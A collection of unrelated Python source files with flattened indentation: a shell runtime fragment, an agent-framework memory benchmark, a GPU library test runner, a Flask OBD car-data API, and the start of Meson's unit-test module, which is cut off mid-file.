current_worker = threading.currentThread()
if isinstance(current_worker, ShBaseThread):
return current_worker, current_worker.state
else: # UI thread uses runtime for its state
return None, self.state
@staticmethod
def handle_PYTHONPATH():
"""
Add any user set python paths right after the dot or at the beginning
if dot is not in the paths.
"""
python_path = os.environ.get('PYTHONPATH', None) # atomic access for check and retrieval
if python_path:
try:
idxdot = sys.path.index('.') + 1
except ValueError:
idxdot = 0
# Insert in the reversed order so idxdot does not need to change
for pth in reversed(python_path.split(':')):
if pth == '':
continue
pth = os.path.expanduser(pth)
if pth not in sys.path:
sys.path.insert(idxdot, pth)
|
case.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# ------------------------------------------------------------------------------
#
# Copyright 2022 Valory AG
# Copyright 2018-2021 Fetch.AI Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# ------------------------------------------------------------------------------
"""Memory usage check."""
import time
from threading import Thread
from typing import List, Tuple, Union
from aea_cli_benchmark.utils import SyncedGeneratorConnection # noqa: I100
from aea_cli_benchmark.utils import (
get_mem_usage_in_mb,
make_agent,
make_envelope,
make_skill,
wait_for_condition,
)
from aea.protocols.base import Message
from aea.registries.resources import Resources
from aea.skills.base import Handler
from packages.fetchai.protocols.default.message import DefaultMessage
class TestHandler(Handler):
"""Dummy handler to handle messages."""
SUPPORTED_PROTOCOL = DefaultMessage.protocol_id
def setup(self) -> None:
"""Noop setup."""
def teardown(self) -> None:
"""Noop teardown."""
def handle(self, message: Message) -> None:
"""Handle incoming message."""
self.context.outbox.put(make_envelope(message.to, message.sender))
def run(duration: int, runtime_mode: str) -> List[Tuple[str, Union[int, float]]]:
"""Check memory usage."""
# pylint: disable=import-outside-toplevel,unused-import
# import manually due to some lazy imports in decision_maker
import aea.decision_maker.default # noqa: F401
connection = SyncedGeneratorConnection.make()
resources = Resources()
resources.add_connection(connection)
agent = make_agent(runtime_mode=runtime_mode, resources=resources)
agent.resources.add_skill(make_skill(agent, handlers={"test": TestHandler}))
t = Thread(target=agent.start, daemon=True)
t.start()
wait_for_condition(lambda: agent.is_running, timeout=5)
connection.enable()
time.sleep(duration)
connection.disable()
mem_usage = get_mem_usage_in_mb()
agent.stop()
t.join(5)
rate = connection.count_in / duration
return [
("envelopes received", connection.count_in),
("envelopes sent", connection.count_out),
("rate (envelopes/second)", rate),
("mem usage (Mb)", mem_usage),
]
|
rtest.py
|
#!/usr/bin/python3
"""Copyright 2021 Advanced Micro Devices, Inc.
Run tests on build"""
import re
import os
import sys
import subprocess
import shlex
import argparse
import pathlib
import platform
from genericpath import exists
from fnmatch import fnmatchcase
from xml.dom import minidom
import multiprocessing
import time
SCRIPT_VERSION = 0.1
args = {}
OS_info = {}
timeout = False
test_proc = None
stop = 0
fail_regex = r'error|fail'
test_script = [ 'cd %IDIR%', '%XML%' ]
class ArgAction(argparse.Action):
def __init__(self, option_strings, dest, nargs=None, **kwargs):
if nargs != 2:
raise ValueError("nargs must be 2")
super().__init__(option_strings, dest, nargs, **kwargs)
def __call__(self, parser, namespace, values, option_string=None):
old = getattr(namespace, self.dest, {})
if old is None:
new = {values[0]: values[1]}
else:
new = {**old, values[0]: values[1]}
setattr(namespace, self.dest, new)
def parse_args():
"""Parse command-line arguments"""
parser = argparse.ArgumentParser(description="""
Checks build arguments
""")
parser.add_argument('-t', '--test', required=True, type=str, action='append',
help='Test set to run from rtest.xml (required, e.g. osdb)')
parser.add_argument('-g', '--debug', required=False, default=False, action='store_true',
help='Test Debug build (optional, default: false)')
parser.add_argument('-o', '--output', type=str, required=False, default="xml",
help='Test output file (optional, default: test_detail.xml)')
parser.add_argument('-a', '--argument', action=ArgAction, nargs=2, metavar=('NAME', 'VALUE'), default={},
help='Arguments to substitute into the xml file (optional, multiple)')
parser.add_argument( '--install_dir', type=str, required=False, default="build",
help='Installation directory where build or release folders are (optional, default: build)')
parser.add_argument( '--fail_test', default=False, required=False, action='store_true',
help='Return as if test failed (optional, default: false)')
# parser.add_argument('-v', '--verbose', required=False, default = False, action='store_true',
# help='Verbose install (optional, default: False)')
return parser.parse_args()
def vram_detect():
global OS_info
OS_info["VRAM"] = 0
if os.name == "nt":
cmd = "hipinfo.exe"
process = subprocess.run([cmd], stdout=subprocess.PIPE)
for line_in in process.stdout.decode().splitlines():
if 'totalGlobalMem' in line_in:
OS_info["VRAM"] = float(line_in.split()[1])
break
else:
cmd = "rocminfo"
process = subprocess.run([cmd], stdout=subprocess.PIPE)
for line_in in process.stdout.decode().splitlines():
match = re.search(r'.*Size:.*([0-9]+)\(.*\).*KB', line_in, re.IGNORECASE)
if match:
OS_info["VRAM"] = float(match.group(1))/(1024*1024)
break
def os_detect():
global OS_info
if os.name == "nt":
OS_info["ID"] = platform.system()
else:
inf_file = "/etc/os-release"
if os.path.exists(inf_file):
with open(inf_file) as f:
for line in f:
if "=" in line:
k,v = line.strip().split("=")
OS_info[k] = v.replace('"','')
OS_info["NUM_PROC"] = os.cpu_count()
vram_detect()
print(OS_info)
def create_dir(dir_path):
if os.path.isabs(dir_path):
full_path = dir_path
else:
full_path = os.path.join( os.getcwd(), dir_path )
return pathlib.Path(full_path).mkdir(parents=True, exist_ok=True)
def delete_dir(dir_path) :
if (not os.path.exists(dir_path)):
return
if os.name == "nt":
return run_cmd( "RMDIR" , f"/S /Q {dir_path}")
else:
linux_path = pathlib.Path(dir_path).absolute()
return run_cmd( "rm" , f"-rf {linux_path}")
class TimerProcess(multiprocessing.Process):
def __init__(self, start, stop, kill_pid):
multiprocessing.Process.__init__(self)
self.quit = multiprocessing.Event()
self.timed_out = multiprocessing.Event()
self.start_time = start
self.max_time = stop
self.kill_pid = kill_pid
def run(self):
while not self.quit.is_set():
#print( f'time_stop {self.start_time} limit {self.max_time}')
if (self.max_time == 0):
return
t = time.monotonic()
if ( t - self.start_time > self.max_time ):
print( f'killing {self.kill_pid} t {t}')
if os.name == "nt":
cmd = ['TASKKILL', '/F', '/T', '/PID', str(self.kill_pid)]
proc = subprocess.Popen(cmd, stdout=sys.stdout, stderr=sys.stderr)
else:
os.kill(self.kill_pid, signal.SIGKILL)
self.timed_out.set()
self.stop()
pass
def stop(self):
self.quit.set()
def stopped(self):
return self.timed_out.is_set()
def time_stop(start, pid):
global timeout, stop
while (True):
print( f'time_stop {start} limit {stop}')
t = time.monotonic()
if (stop == 0):
return
if ( (stop > 0) and (t - start > stop) ):
print( f'killing {pid} t {t}')
if os.name == "nt":
cmd = ['TASKKILL', '/F', '/T', '/PID', str(pid)]
proc = subprocess.Popen(cmd, stdout=sys.stdout, stderr=sys.stderr)
else:
test_proc.kill()
timeout = True
stop = 0
time.sleep(0)
def find_cmd(cmd):
if os.name == "nt":
status, _ = subprocess.getstatusoutput(f"where {cmd}")
if status != 0:
raise RuntimeError(f"Cannot find the command or executable {cmd}")
return cmd
else:
status, _ = subprocess.getstatusoutput(f"which {cmd}")
if status == 0:
return cmd
search_paths = [
"."
]
for path_option in search_paths:
cmd_opt = f"{path_option}/{cmd}"
if os.path.isfile(cmd_opt) and os.access(cmd_opt, os.X_OK):
return cmd_opt
raise RuntimeError(f"Cannot find the command or executable {cmd}")
def run_cmd(cmd, test = False, time_limit = 0):
global args
global test_proc, timer_thread
global stop
if (cmd.startswith('cd ')):
return os.chdir(cmd[3:])
if (cmd.startswith('mkdir ')):
return create_dir(cmd[6:])
cmdline = f"{cmd}"
print(cmdline)
try:
if not test:
proc = subprocess.run(cmdline, check=True, stderr=subprocess.STDOUT, shell=True)
status = proc.returncode
else:
error = False
timeout = False
cmd_parts = shlex.split(cmdline)
cmdline = find_cmd(cmd_parts[0]) + " " + cmd[len(cmd_parts[0]):]
test_proc = subprocess.Popen(cmdline, text=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, shell=True)
if time_limit > 0:
start = time.monotonic()
#p = multiprocessing.Process(target=time_stop, args=(start, test_proc.pid))
p = TimerProcess(start, time_limit, test_proc.pid)
p.start()
while True:
output = test_proc.stdout.readline()
if output == '' and test_proc.poll() is not None:
break
elif output:
outstring = output.strip()
print (outstring)
error = error or re.search(fail_regex, outstring, re.IGNORECASE)
status = test_proc.poll()
if time_limit > 0:
p.stop()
p.join()
timeout = p.stopped()
print(f"timeout {timeout}")
if error:
status = 1
elif timeout:
status = 2
else:
status = test_proc.returncode
except:
import traceback
exc = traceback.format_exc()
print( "Python Exception: {0}".format(exc) )
status = 3
return status
def batch(script, xml):
global OS_info
global args
global fail_regex
#
cwd = pathlib.os.curdir
rtest_cwd_path = os.path.abspath( os.path.join( cwd, 'rtest.xml') )
if os.path.isfile(rtest_cwd_path) and os.path.dirname(rtest_cwd_path).endswith( "staging" ):
# if in a staging directory then test locally
test_dir = cwd
else:
build_type = "debug" if args.debug else "release"
search_paths = [
f"{args.install_dir}//{build_type}//clients//staging",
f"{args.install_dir}//{build_type}//test",
f"{args.install_dir}"
]
test_dir = ""
for path_option in search_paths:
if os.path.exists(path_option):
test_dir = path_option
break
if test_dir == "":
print(f"ERROR: Could not determine a valid test directory. Checked {', '.join(search_paths)}.")
return 2
fail = False
for i in range(len(script)):
cmdline = script[i]
xcmd = cmdline.replace('%IDIR%', test_dir)
cmd = xcmd.replace('%ODIR%', args.output)
if cmd.startswith('tdir '):
if pathlib.Path(cmd[5:]).exists():
return 0 # all further cmds skipped
else:
continue
error = False
if cmd.startswith('%XML%'):
fileversion = xml.getElementsByTagName('fileversion')
if len(fileversion) == 0:
print("INFO: Could not find the version of this xml configuration file. Version 0.1 assumed.")
elif len(fileversion) > 1:
print("WARNING: Multiple version tags found.")
else:
version = float(fileversion[0].firstChild.data)
if version > SCRIPT_VERSION:
print(f"ERROR: This file requires script version >= {version}, have version {SCRIPT_VERSION}")
exit(1)
if xml.documentElement.hasAttribute('failure-regex'):
fail_regex = xml.documentElement.getAttribute('failure-regex')
# run the matching tests listed in the xml test file
var_subs = {}
for var in xml.getElementsByTagName('var'):
name = var.getAttribute('name')
if var.hasAttribute('value'):
val = var.getAttribute('value')
elif var.firstChild is not None:
val = var.firstChild.data
else:
val = ""
var_subs[name] = val
for name, val in args.argument.items():
var_subs[name] = val
for test in xml.getElementsByTagName('test'):
sets = test.getAttribute('sets')
runset = sets.split(',')
if len([x for x in args.test if x in runset]):
for run in test.getElementsByTagName('run'):
name = run.getAttribute('name')
vram_limit = run.getAttribute('vram_min')
if vram_limit:
if OS_info["VRAM"] < float(vram_limit):
print( f'***\n*** Skipped: {name} due to VRAM req.\n***')
continue
if name:
print( f'***\n*** Running: {name}\n***')
time_limit = run.getAttribute('time_max')
if time_limit:
timeout = float(time_limit)
else:
timeout = 0
raw_cmd = run.firstChild.data
var_cmd = raw_cmd.format_map(var_subs)
error = run_cmd(var_cmd, True, timeout)
if (error == 2):
print( f'***\n*** Timed out when running: {name}\n***')
continue
else:
error = run_cmd(cmd)
fail = fail or error
if (fail):
if (cmd == "%XML%"):
print("FAILED xml test suite!")
else:
print(f"ERROR running: {cmd}")
if (os.curdir != cwd):
os.chdir( cwd )
return 1
if (os.curdir != cwd):
os.chdir( cwd )
return 0
def run_tests():
global test_script
global xmlDoc
# install
cwd = os.curdir
xmlPath = os.path.join( cwd, 'rtest.xml')
xmlDoc = minidom.parse( xmlPath )
scripts = []
scripts.append( test_script )
for i in scripts:
if (batch(i, xmlDoc)):
#print("Failure in script. ABORTING")
if (os.curdir != cwd):
os.chdir( cwd )
return 1
if (os.curdir != cwd):
os.chdir( cwd )
return 0
def main():
global args
global timer_thread
os_detect()
args = parse_args()
status = run_tests()
if args.fail_test: status = 1
if (status):
sys.exit(status)
if __name__ == '__main__':
main()
|
api.py
|
import time
from flask import Flask, Response
import random
from chunk import Chunk
from trip import Trip
from TripDB import TripDB
from OBDConnection import OBDConnection as connect
import os
import sys
import time
import subprocess
from flask import Flask, request, jsonify
from multiprocessing import Process, Queue
database = None
trip = None
chunk = None
obdConnection = None
def initializeData():
initTrip()
initChunk()
initDB()
connectOBD()
app = Flask(__name__)
@app.route('/start')
def start_trip():
pass
@app.route('/time')
def get_current_time():
return {
'time': time.strftime('%A %B, %d %Y %H:%M:%S'),
}
@app.route('/stream')
def getStream():
def generate():
while obdConnection.getCurrentData():
chunk.update(obdConnection.getCurrentData())
time.sleep(0.4)
yield str(obdConnection.getCurrentData())+"\n"
return Response(generate(), mimetype='application/json')
@app.route('/streamData')
def getCurrentData():
global chunk
if obdConnection:
current_data = obdConnection.getCurrentData()
chunk.update(current_data)
return current_data
else:
return {}
@app.route('/processedData')
def getProcessedData():
trip.update(chunk.getData())
database.updateTrip(trip.getData())
chunk.restart()
return trip.getData()
@app.route('/getTrip')
def getTrip():
return trip.getData()
@app.route('/upload')
def upload():
database.upload()
return database.upload()
@app.route('/clear')
def clear():
database.clear()
return {'OK': "Cleared previous trips from local database"}
@app.route('/connectOBD')
def connectOBD():
global obdConnection
if obdConnection:
return {'OBD':"ALREADY CONNECTED"}
else:
try:
obdConnection =["something"]
obdConnection = connect()
return {"OBD": "CONNECTED"}
except:
obdConnection = None
print("Something went wrong")
def initTrip():
global trip
if not trip:
trip=Trip()
def initChunk():
global chunk
if not chunk:
chunk=Chunk()
def initDB():
global database
if not database:
database=TripDB()
some_queue = None
@app.route('/restart')
def restart():
some_queue.put("something")
return {"OK":"Quit"}
def start_flaskapp(queue):
global some_queue
some_queue = queue
initializeData()
app.run(debug=True, use_reloader=False)
if __name__ == '__main__':
# app.run(debug=True, use_reloader=False)
q = Queue()
p = Process(target=start_flaskapp, args=[q,])
p.start()
while True: #wathing queue, sleep if there is no call, otherwise break
if q.empty():
time.sleep(1)
else:
break
p.terminate() #terminate flaskapp and then restart the app on subprocess
args = [sys.executable] + [sys.argv[0]]
subprocess.call(args)
|
run_unittests.py
|
#!/usr/bin/env python3
# Copyright 2016-2017 The Meson development team
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import stat
import subprocess
import re
import json
import tempfile
import textwrap
import os
import shutil
import sys
import unittest
import platform
import pickle
import functools
import io
import operator
import threading
import urllib.error
import urllib.request
from itertools import chain
from unittest import mock
from configparser import ConfigParser
from contextlib import contextmanager
from glob import glob
from pathlib import (PurePath, Path)
from distutils.dir_util import copy_tree
import mesonbuild.mlog
import mesonbuild.depfile
import mesonbuild.compilers
import mesonbuild.environment
import mesonbuild.mesonlib
import mesonbuild.coredata
import mesonbuild.modules.gnome
from mesonbuild.interpreter import Interpreter, ObjectHolder
from mesonbuild.ast import AstInterpreter
from mesonbuild.mesonlib import (
BuildDirLock, LibType, MachineChoice, PerMachine, Version, is_windows,
is_osx, is_cygwin, is_dragonflybsd, is_openbsd, is_haiku, is_sunos,
windows_proof_rmtree, python_command, version_compare, split_args,
quote_arg
)
from mesonbuild.environment import detect_ninja
from mesonbuild.mesonlib import MesonException, EnvironmentException
from mesonbuild.dependencies import PkgConfigDependency, ExternalProgram
from mesonbuild.build import Target
import mesonbuild.modules.pkgconfig
from mesonbuild.mtest import TAPParser, TestResult
from run_tests import (
Backend, FakeBuild, FakeCompilerOptions,
ensure_backend_detects_changes, exe_suffix, get_backend_commands,
get_builddir_target_args, get_fake_env, get_fake_options, get_meson_script,
run_configure_inprocess, run_mtest_inprocess
)
URLOPEN_TIMEOUT = 5
def get_dynamic_section_entry(fname, entry):
if is_cygwin() or is_osx():
raise unittest.SkipTest('Test only applicable to ELF platforms')
try:
raw_out = subprocess.check_output(['readelf', '-d', fname],
universal_newlines=True)
except FileNotFoundError:
# FIXME: Try using depfixer.py:Elf() as a fallback
raise unittest.SkipTest('readelf not found')
pattern = re.compile(entry + r': \[(.*?)\]')
for line in raw_out.split('\n'):
m = pattern.search(line)
if m is not None:
return m.group(1)
return None # The file did not contain the specified entry.
def get_soname(fname):
return get_dynamic_section_entry(fname, 'soname')
def get_rpath(fname):
return get_dynamic_section_entry(fname, r'(?:rpath|runpath)')
def is_tarball():
if not os.path.isdir('docs'):
return True
return False
def is_ci():
if 'CI' in os.environ:
return True
return False
def is_pull():
# Travis
if os.environ.get('TRAVIS_PULL_REQUEST', 'false') != 'false':
return True
# Azure
if 'SYSTEM_PULLREQUEST_ISFORK' in os.environ:
return True
return False
def _git_init(project_dir):
subprocess.check_call(['git', 'init'], cwd=project_dir, stdout=subprocess.DEVNULL)
subprocess.check_call(['git', 'config',
'user.name', 'Author Person'], cwd=project_dir)
subprocess.check_call(['git', 'config',
'user.email', 'teh_coderz@example.com'], cwd=project_dir)
subprocess.check_call('git add *', cwd=project_dir, shell=True,
stdout=subprocess.DEVNULL)
subprocess.check_call(['git', 'commit', '-a', '-m', 'I am a project'], cwd=project_dir,
stdout=subprocess.DEVNULL)
@functools.lru_cache()
def is_real_gnu_compiler(path):
'''
Check if the gcc we have is a real gcc and not a macOS wrapper around clang
'''
if not path:
return False
out = subprocess.check_output([path, '--version'], universal_newlines=True, stderr=subprocess.STDOUT)
return 'Free Software Foundation' in out
def skipIfNoExecutable(exename):
'''
Skip this test if the given executable is not found.
'''
def wrapper(func):
@functools.wraps(func)
def wrapped(*args, **kwargs):
if shutil.which(exename) is None:
raise unittest.SkipTest(exename + ' not found')
return func(*args, **kwargs)
return wrapped
return wrapper
def skipIfNoPkgconfig(f):
'''
Skip this test if no pkg-config is found, unless we're on CI.
This allows users to run our test suite without having
pkg-config installed on, f.ex., macOS, while ensuring that our CI does not
silently skip the test because of misconfiguration.
Note: Yes, we provide pkg-config even while running Windows CI
'''
@functools.wraps(f)
def wrapped(*args, **kwargs):
if not is_ci() and shutil.which('pkg-config') is None:
raise unittest.SkipTest('pkg-config not found')
return f(*args, **kwargs)
return wrapped
def skipIfNoPkgconfigDep(depname):
'''
Skip this test if the given pkg-config dep is not found, unless we're on CI.
'''
def wrapper(func):
@functools.wraps(func)
def wrapped(*args, **kwargs):
if not is_ci() and shutil.which('pkg-config') is None:
raise unittest.SkipTest('pkg-config not found')
if not is_ci() and subprocess.call(['pkg-config', '--exists', depname]) != 0:
raise unittest.SkipTest('pkg-config dependency {} not found.'.format(depname))
return func(*args, **kwargs)
return wrapped
return wrapper
def skip_if_no_cmake(f):
'''
Skip this test if no cmake is found, unless we're on CI.
This allows users to run our test suite without having
cmake installed on, f.ex., macOS, while ensuring that our CI does not
silently skip the test because of misconfiguration.
'''
@functools.wraps(f)
def wrapped(*args, **kwargs):
if not is_ci() and shutil.which('cmake') is None:
raise unittest.SkipTest('cmake not found')
return f(*args, **kwargs)
return wrapped
def skip_if_not_language(lang):
def wrapper(func):
@functools.wraps(func)
def wrapped(*args, **kwargs):
try:
env = get_fake_env()
f = getattr(env, 'detect_{}_compiler'.format(lang))
f(MachineChoice.HOST)
except EnvironmentException:
raise unittest.SkipTest('No {} compiler found.'.format(lang))
return func(*args, **kwargs)
return wrapped
return wrapper
def skip_if_env_set(key):
'''
Skip a test if a particular env is set, except when running under CI
'''
def wrapper(func):
@functools.wraps(func)
def wrapped(*args, **kwargs):
old = None
if key in os.environ:
if not is_ci():
raise unittest.SkipTest('Env var {!r} set, skipping'.format(key))
old = os.environ.pop(key)
try:
return func(*args, **kwargs)
finally:
if old is not None:
os.environ[key] = old
return wrapped
return wrapper
def skip_if_not_base_option(feature):
"""Skip tests if The compiler does not support a given base option.
for example, ICC doesn't currently support b_sanitize.
"""
def actual(f):
@functools.wraps(f)
def wrapped(*args, **kwargs):
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
if feature not in cc.base_options:
raise unittest.SkipTest(
'{} not available with {}'.format(feature, cc.id))
return f(*args, **kwargs)
return wrapped
return actual
@contextmanager
def temp_filename():
'''A context manager which provides a filename to an empty temporary file.
On exit the file will be deleted.
'''
fd, filename = tempfile.mkstemp()
os.close(fd)
try:
yield filename
finally:
try:
os.remove(filename)
except OSError:
pass
@contextmanager
def no_pkgconfig():
'''
A context manager that overrides shutil.which and ExternalProgram to force
them to return None for pkg-config to simulate it not existing.
'''
old_which = shutil.which
old_search = ExternalProgram._search
def new_search(self, name, search_dir):
if name == 'pkg-config':
return [None]
return old_search(self, name, search_dir)
def new_which(cmd, *kwargs):
if cmd == 'pkg-config':
return None
return old_which(cmd, *kwargs)
shutil.which = new_which
ExternalProgram._search = new_search
try:
yield
finally:
shutil.which = old_which
ExternalProgram._search = old_search
class PatchModule:
'''
Fancy monkey-patching! Whee! Can't use mock.patch because it only
patches in the local namespace.
'''
def __init__(self, func, name, impl):
self.func = func
assert(isinstance(name, str))
self.func_name = name
self.old_impl = None
self.new_impl = impl
def __enter__(self):
self.old_impl = self.func
exec('{} = self.new_impl'.format(self.func_name))
def __exit__(self, *args):
exec('{} = self.old_impl'.format(self.func_name))
class InternalTests(unittest.TestCase):
def test_version_number(self):
searchfunc = mesonbuild.environment.search_version
self.assertEqual(searchfunc('foobar 1.2.3'), '1.2.3')
self.assertEqual(searchfunc('1.2.3'), '1.2.3')
self.assertEqual(searchfunc('foobar 2016.10.28 1.2.3'), '1.2.3')
self.assertEqual(searchfunc('2016.10.28 1.2.3'), '1.2.3')
self.assertEqual(searchfunc('foobar 2016.10.128'), 'unknown version')
self.assertEqual(searchfunc('2016.10.128'), 'unknown version')
def test_mode_symbolic_to_bits(self):
modefunc = mesonbuild.mesonlib.FileMode.perms_s_to_bits
self.assertEqual(modefunc('---------'), 0)
self.assertEqual(modefunc('r--------'), stat.S_IRUSR)
self.assertEqual(modefunc('---r-----'), stat.S_IRGRP)
self.assertEqual(modefunc('------r--'), stat.S_IROTH)
self.assertEqual(modefunc('-w-------'), stat.S_IWUSR)
self.assertEqual(modefunc('----w----'), stat.S_IWGRP)
self.assertEqual(modefunc('-------w-'), stat.S_IWOTH)
self.assertEqual(modefunc('--x------'), stat.S_IXUSR)
self.assertEqual(modefunc('-----x---'), stat.S_IXGRP)
self.assertEqual(modefunc('--------x'), stat.S_IXOTH)
self.assertEqual(modefunc('--S------'), stat.S_ISUID)
self.assertEqual(modefunc('-----S---'), stat.S_ISGID)
self.assertEqual(modefunc('--------T'), stat.S_ISVTX)
self.assertEqual(modefunc('--s------'), stat.S_ISUID | stat.S_IXUSR)
self.assertEqual(modefunc('-----s---'), stat.S_ISGID | stat.S_IXGRP)
self.assertEqual(modefunc('--------t'), stat.S_ISVTX | stat.S_IXOTH)
self.assertEqual(modefunc('rwx------'), stat.S_IRWXU)
self.assertEqual(modefunc('---rwx---'), stat.S_IRWXG)
self.assertEqual(modefunc('------rwx'), stat.S_IRWXO)
# We could keep listing combinations exhaustively but that seems
# tedious and pointless. Just test a few more.
self.assertEqual(modefunc('rwxr-xr-x'),
stat.S_IRWXU |
stat.S_IRGRP | stat.S_IXGRP |
stat.S_IROTH | stat.S_IXOTH)
self.assertEqual(modefunc('rw-r--r--'),
stat.S_IRUSR | stat.S_IWUSR |
stat.S_IRGRP |
stat.S_IROTH)
self.assertEqual(modefunc('rwsr-x---'),
stat.S_IRWXU | stat.S_ISUID |
stat.S_IRGRP | stat.S_IXGRP)
def test_compiler_args_class(self):
cargsfunc = mesonbuild.compilers.CompilerArgs
cc = mesonbuild.compilers.CCompiler([], 'fake', False, MachineChoice.HOST, mock.Mock())
# Test that bad initialization fails
self.assertRaises(TypeError, cargsfunc, [])
self.assertRaises(TypeError, cargsfunc, [], [])
self.assertRaises(TypeError, cargsfunc, cc, [], [])
# Test that empty initialization works
a = cargsfunc(cc)
self.assertEqual(a, [])
# Test that list initialization works
a = cargsfunc(['-I.', '-I..'], cc)
self.assertEqual(a, ['-I.', '-I..'])
# Test that there is no de-dup on initialization
self.assertEqual(cargsfunc(['-I.', '-I.'], cc), ['-I.', '-I.'])
## Test that appending works
a.append('-I..')
self.assertEqual(a, ['-I..', '-I.'])
a.append('-O3')
self.assertEqual(a, ['-I..', '-I.', '-O3'])
## Test that in-place addition works
a += ['-O2', '-O2']
self.assertEqual(a, ['-I..', '-I.', '-O3', '-O2', '-O2'])
# Test that removal works
a.remove('-O2')
self.assertEqual(a, ['-I..', '-I.', '-O3', '-O2'])
# Test that de-dup happens on addition
a += ['-Ifoo', '-Ifoo']
self.assertEqual(a, ['-Ifoo', '-I..', '-I.', '-O3', '-O2'])
# .extend() is just +=, so we don't test it
## Test that addition works
# Test that adding a list with just one old arg works and yields the same array
a = a + ['-Ifoo']
self.assertEqual(a, ['-Ifoo', '-I..', '-I.', '-O3', '-O2'])
# Test that adding a list with one arg new and one old works
a = a + ['-Ifoo', '-Ibaz']
self.assertEqual(a, ['-Ifoo', '-Ibaz', '-I..', '-I.', '-O3', '-O2'])
# Test that adding args that must be prepended and appended works
a = a + ['-Ibar', '-Wall']
self.assertEqual(a, ['-Ibar', '-Ifoo', '-Ibaz', '-I..', '-I.', '-O3', '-O2', '-Wall'])
## Test that reflected addition works
# Test that adding to a list with just one old arg works and yields the same array
a = ['-Ifoo'] + a
self.assertEqual(a, ['-Ibar', '-Ifoo', '-Ibaz', '-I..', '-I.', '-O3', '-O2', '-Wall'])
# Test that adding to a list with just one new arg that is not pre-pended works
a = ['-Werror'] + a
self.assertEqual(a, ['-Ibar', '-Ifoo', '-Ibaz', '-I..', '-I.', '-Werror', '-O3', '-O2', '-Wall'])
# Test that adding to a list with two new args preserves the order
a = ['-Ldir', '-Lbah'] + a
self.assertEqual(a, ['-Ibar', '-Ifoo', '-Ibaz', '-I..', '-I.', '-Ldir', '-Lbah', '-Werror', '-O3', '-O2', '-Wall'])
# Test that adding to a list with old args does nothing
a = ['-Ibar', '-Ibaz', '-Ifoo'] + a
self.assertEqual(a, ['-Ibar', '-Ifoo', '-Ibaz', '-I..', '-I.', '-Ldir', '-Lbah', '-Werror', '-O3', '-O2', '-Wall'])
## Test that adding libraries works
l = cargsfunc(cc, ['-Lfoodir', '-lfoo'])
self.assertEqual(l, ['-Lfoodir', '-lfoo'])
# Adding a library and a libpath appends both correctly
l += ['-Lbardir', '-lbar']
self.assertEqual(l, ['-Lbardir', '-Lfoodir', '-lfoo', '-lbar'])
# Adding the same library again does nothing
l += ['-lbar']
self.assertEqual(l, ['-Lbardir', '-Lfoodir', '-lfoo', '-lbar'])
## Test that 'direct' append and extend works
l = cargsfunc(cc, ['-Lfoodir', '-lfoo'])
self.assertEqual(l, ['-Lfoodir', '-lfoo'])
# Direct-adding a library and a libpath appends both correctly
l.extend_direct(['-Lbardir', '-lbar'])
self.assertEqual(l, ['-Lfoodir', '-lfoo', '-Lbardir', '-lbar'])
# Direct-adding the same library again still adds it
l.append_direct('-lbar')
self.assertEqual(l, ['-Lfoodir', '-lfoo', '-Lbardir', '-lbar', '-lbar'])
# Direct-adding with absolute path deduplicates
l.append_direct('/libbaz.a')
self.assertEqual(l, ['-Lfoodir', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a'])
# Adding libbaz again does nothing
l.append_direct('/libbaz.a')
self.assertEqual(l, ['-Lfoodir', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a'])
def test_compiler_args_class_gnuld(self):
cargsfunc = mesonbuild.compilers.CompilerArgs
## Test --start/end-group
linker = mesonbuild.linkers.GnuDynamicLinker([], MachineChoice.HOST, 'fake', '-Wl,')
gcc = mesonbuild.compilers.GnuCCompiler([], 'fake', False, MachineChoice.HOST, mock.Mock(), linker=linker)
## Ensure that the fake compiler is never called by overriding the relevant function
gcc.get_default_include_dirs = lambda: ['/usr/include', '/usr/share/include', '/usr/local/include']
## Test that 'direct' append and extend works
l = cargsfunc(gcc, ['-Lfoodir', '-lfoo'])
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Wl,--end-group'])
# Direct-adding a library and a libpath appends both correctly
l.extend_direct(['-Lbardir', '-lbar'])
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-Wl,--end-group'])
# Direct-adding the same library again still adds it
l.append_direct('-lbar')
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-lbar', '-Wl,--end-group'])
# Direct-adding with absolute path deduplicates
l.append_direct('/libbaz.a')
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a', '-Wl,--end-group'])
# Adding libbaz again does nothing
l.append_direct('/libbaz.a')
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a', '-Wl,--end-group'])
# Adding a non-library argument doesn't include it in the group
l += ['-Lfoo', '-Wl,--export-dynamic']
self.assertEqual(l.to_native(copy=True), ['-Lfoo', '-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a', '-Wl,--end-group', '-Wl,--export-dynamic'])
# -Wl,-lfoo is detected as a library and gets added to the group
l.append('-Wl,-ldl')
self.assertEqual(l.to_native(copy=True), ['-Lfoo', '-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a', '-Wl,--export-dynamic', '-Wl,-ldl', '-Wl,--end-group'])
def test_compiler_args_remove_system(self):
